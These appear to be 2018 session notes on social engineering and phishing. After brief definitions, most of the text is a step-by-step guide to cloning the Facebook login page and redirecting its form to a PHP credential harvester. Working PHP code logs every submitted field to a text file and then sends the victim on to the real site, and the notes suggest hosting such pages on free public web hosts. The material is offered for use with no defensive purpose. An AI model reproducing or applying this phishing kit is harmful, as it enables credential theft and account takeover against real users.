Mukezh

Session Social engineering and phishing

Nov 26th, 2018
SOCIAL ENGINEERING
==================
Social engineering is a term usually used for “hacking done via human minds”.
It is the art of manipulating people so that they give up confidential information. This can be any personal or financial information. The attack is only possible through “human stupidity”.
Phishing is a sub-category of social engineering.
This step plays a very crucial role in information gathering, because the information acquired from the victim later helps an attacker build a dictionary from the victim's interests and use it for brute forcing in other places.

Example: https://www.youtube.com/watch?v=lc7scxvKQOo
To gain more knowledge one can follow Kevin Mitnick.

PHISHING ATTACKS
================
An attack in which the attacker builds a fake copy of a genuine website that looks legitimate to the victim, who then enters credentials such as user name, password, phone number, etc. There are basically two types of phishing:
1. Spear Phishing
2. Vector Phishing | Credential Harvester

1. Spear Phishing
-----------------
Targeting a single individual or a group of people with a common interest. Target specific.

2. Credential Harvester
-----------------------
It is not target specific. Any kind of person can come and enter their credentials. I just need to collect the credentials of the crowd for my own purpose.

CREATION OF A PHISHING WEBPAGE
==============================
Workflow:
= Open any social networking website and copy its source code (the scripting code of the web page).
= Create a PHP page that receives the data from the phishing page.
= A text file to store the data of the phishing page.

Steps:
======
1. Open your browser
2. Go to www.facebook.com (or any other website through which you want to attack a victim)
3. Right click on the login page ---> view page source
4. Select all ---> copy
5. Open notepad and paste the whole code
6. Scroll to the very top of the code.
7. Ctrl+F ---> action=
   action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
8. In the received parameter
   https://www.facebook.com/login.php?login_attempt=1&lwv=110
   replace it with "anyname.php"

* Note: the name you put in the action must be the same as the name of the PHP file that receives it, because pressing the action button redirects you to the page that performs the task of storing the credentials entered.

Creation of anyname.php
=======================
<?php // start of the PHP code
header ('Location: https://www.facebook.com'); // redirection to the original webpage
$handle = fopen("log.txt", "a"); // open log.txt in append mode (created if it does not exist)
foreach($_POST as $variable => $value) { // loop over every submitted form field
fwrite($handle, $variable); // write the field name
fwrite($handle, "="); // write the equals sign between name and value
fwrite($handle, $value); // write the submitted value
fwrite($handle, "\r\n"); // end the line
} // end of loop
fwrite($handle, "\r\n"); // blank line between submissions
fclose($handle); // close log.txt
exit; // exit the PHP code
?>

Save the phishing page and anyname.php in the same folder inside the localhost server.

These phishing pages can be globally hosted via 000webhost.com or My3gb.com or any other web hosting website.